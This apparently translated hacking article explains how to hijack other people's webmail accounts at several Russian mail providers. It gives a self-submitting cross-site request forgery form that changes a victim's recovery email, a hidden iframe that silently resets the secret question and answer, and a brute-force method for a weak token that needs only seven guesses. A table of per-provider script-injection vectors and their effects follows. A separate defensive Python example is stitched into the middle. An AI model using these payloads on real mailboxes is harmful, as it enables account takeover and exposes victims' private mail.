Admittedly, the settings of a mail.ru mailbox can no longer be changed with the GET method, so I'll describe the technical side of the question in detail.
I. We send the target mailbox a message containing code that generates a frame, directly in the body of the message, with a link to our site. If possible, the script should work without any user action (click, mouseover, image load, etc.):
II. On the resource http://yoursite.ru we have an HTML document with a form for sending the changed data to the mail.ru server.
The contents of yourscript.html:
<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="email@example.com">
<input type="hidden" value="Save" name="Save">
</form>
<script>
document.anketa.submit();
</script>
Notes: the client-side part of the script is guaranteed to work unchanged only in IE; the submission form is hosted on a separate site specifically to "lighten" the message.
We inject the script through the style tag.
Address of the settings page: http://mail01.mail.com/scripts/common/genprofile.cgi
Form name: profileform
Name of the text field holding the secret answer: hint_a
WWW.NEWMAIL.RU
In my opinion, a fairly popular mail service, so I'll describe it in detail. Moreover, taking over someone else's account is much easier than it seems at first sight. You can do this: send a message with a script that, when it runs, obtains the session id, generates the necessary requests, and changes the alternative email address (to which the password is subsequently sent) and the secret question and answer. However, if any other address is given in the reminder, the password will be sent to it as long as the secret answer is correct. A further observation: the session id need not be used at all to change the settings. Plus, all tags are allowed. All of the above reduces the amount of code to a couple of lines:
<iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>
The method of hacking e-mail.ru does not quite fit the general theme of the article, but it is still mail. When I needed to get the password for one mailbox, I registered an account of my own as usual and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer without entering the old password. The usual plan of action is to check the tag filtering, get the ID and execute the query. However, changing the settings relies on a special variable, utoken, which is contained in the body of the document. After experimenting with changing the question and answer using a previously known utoken:
I came to the conclusion that neither the ID nor cookies are required to change the settings. Moreover, after monitoring utoken, I found that the four-digit hexadecimal number after the email address firstname.lastname@example.org lies in a very narrow range. Namely, to set a secret question and answer on any mailbox of interest, you need to go through just 7 options: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. When the number is guessed, we get into the desired mailbox.
Notes: at the moment there have been some changes. The password recovery service does not work, so it is advisable to change it immediately. The address for changing the settings has also changed:
The method does not work forever. Probably the user still has to log in to the mailbox through the web interface from time to time.
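The weaknesses described above (settings changeable by GET, no session or cookie required, a token with only seven possible values, no old password asked) map onto four server-side checks. The following is an added defensive example, not code from the article or from any of the services named; the function names, in-memory stores and sample accounts are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # assumption: secret held only by the server
SESSIONS = {}                          # session id -> account (server-side state)
PASSWORDS = {}                         # account -> (salt, PBKDF2 hash)


def _pw_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def register(account, password):
    salt = secrets.token_bytes(16)
    PASSWORDS[account] = (salt, _pw_hash(password, salt))


def login(account, password):
    """Return a fresh 128-bit session id, or None if the password is wrong."""
    salt, stored = PASSWORDS.get(account, (b"", b""))
    if not hmac.compare_digest(stored, _pw_hash(password, salt)):
        return None
    sid = secrets.token_hex(16)
    SESSIONS[sid] = account
    return sid


def settings_token(sid):
    """Anti-forgery token: HMAC over the session id, so it is useless elsewhere."""
    return hmac.new(SERVER_KEY, sid.encode(), hashlib.sha256).hexdigest()


def authorize_change(method, cookie_sid, form):
    """Decide whether a request may change the password or secret question."""
    if method != "POST":
        return False, "state change must not be reachable via GET"
    account = SESSIONS.get(cookie_sid)
    if account is None:
        return False, "no valid session cookie"
    sent = str(form.get("token", "")).encode()
    if not hmac.compare_digest(settings_token(cookie_sid).encode(), sent):
        return False, "token missing or not bound to this session"
    salt, stored = PASSWORDS[account]
    old = str(form.get("old_password", ""))
    if not hmac.compare_digest(stored, _pw_hash(old, salt)):
        return False, "old password required"
    return True, "ok"
```

The token is derived from the session id with a server-held key, so a form auto-submitted from another site cannot supply it, and a value issued for one session is rejected in any other.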
Table with characteristics of free WWW-servers
inbox.ru, bk.ru, list.ru,
email.com, post.com, myself.com, consultant.com and others.
nm.ru, hotmail.ru, orc.ru, nightmail.ru
|In any way||Read / change the question and answer. The password is valid|
| www.netman.ru and www.mailgate.ru
the same mail service, about 80 domains
|www.yandex.ru||OnError, OnLoad||Removing the site *.narod.ru (JS is not required)|
|www.ukr.net|| embed src = javasc
ript: this .wav>
|Read the answer to your security question|
xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru,
pochta.ru, pisem.net, fromru.com, land.ru, and others.
|In many ways||Account deletion|